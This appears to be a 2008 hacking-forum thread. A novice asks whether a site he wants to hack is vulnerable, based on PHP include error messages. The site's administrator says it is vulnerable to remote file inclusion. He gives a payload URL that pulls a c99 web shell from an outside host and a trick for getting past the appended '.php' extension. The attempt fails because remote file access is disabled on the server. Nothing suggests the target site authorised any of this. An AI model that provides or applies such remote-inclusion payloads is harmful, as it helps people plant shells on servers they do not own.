ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2008-04-23 21:33:37

noobonhacking
Member
Registered: 2007-09-14
Posts: 9

Is this site hackable?

I was just going thru internet surfing and I encountered a site. I m noob on hacking. So I wanna ask a question.
I typed www.siteiwanttohack.com/index.php?page=noobonhacking  and it gave me following things:
Warning: main(noobonhacking.php): failed to open stream: No such file or directory in /home/www/web299/web/index.php on line 114

Warning: main(): Failed opening 'noobonhacking.php' for inclusion (include_path='.:/usr/share/php') in /home/www/web299/web/index.php on line 114


I think it can be hacked but I m not sure. Can u help me? Seeking for help..

Offline

#2 2008-04-24 02:58:29

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Is this site hackable?

Good job, im pretty sure thats vulnerable to rfi. It tries to add a .php to the end of the URL, but that can be beaten by adding a question mark to the end. Try this:

www.siteiwanttohack.com/index.php?page=http://members.lycos.co.uk/t0mmy9/c99.txt?

and hopefully you should see a shell on the site


Site admin

Offline

#3 2008-04-24 07:06:07

noobonhacking
Member
Registered: 2007-09-14
Posts: 9

Re: Is this site hackable?

It gave as below:
Warning: main(): URL file-access is disabled in the server configuration in /home/www/web299/web/index.php on line 114

Warning: main(http://members.lycos.co.uk/t0mmy9/c99.txt?.php): failed to open stream: no suitable wrapper could be found in /home/www/web299/web/index.php on line 114

Warning: main(): Failed opening 'http://members.lycos.co.uk/t0mmy9/c99.txt?.php' for inclusion (include_path='.:/usr/share/php') in /home/www/web299/web/index.php on line 114

any more thing on it.

Offline

#4 2008-04-24 11:06:55

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Is this site hackable?

hmm looks like theyve disabled remote file access in php.ini i think your out of look frown

google it but i dont think theres any way to bypass that


Site admin

Offline

#5 2008-04-24 20:29:14

noobonhacking
Member
Registered: 2007-09-14
Posts: 9

Re: Is this site hackable?

Thanks for help..

Offline

Board footer

Powered by FluxBB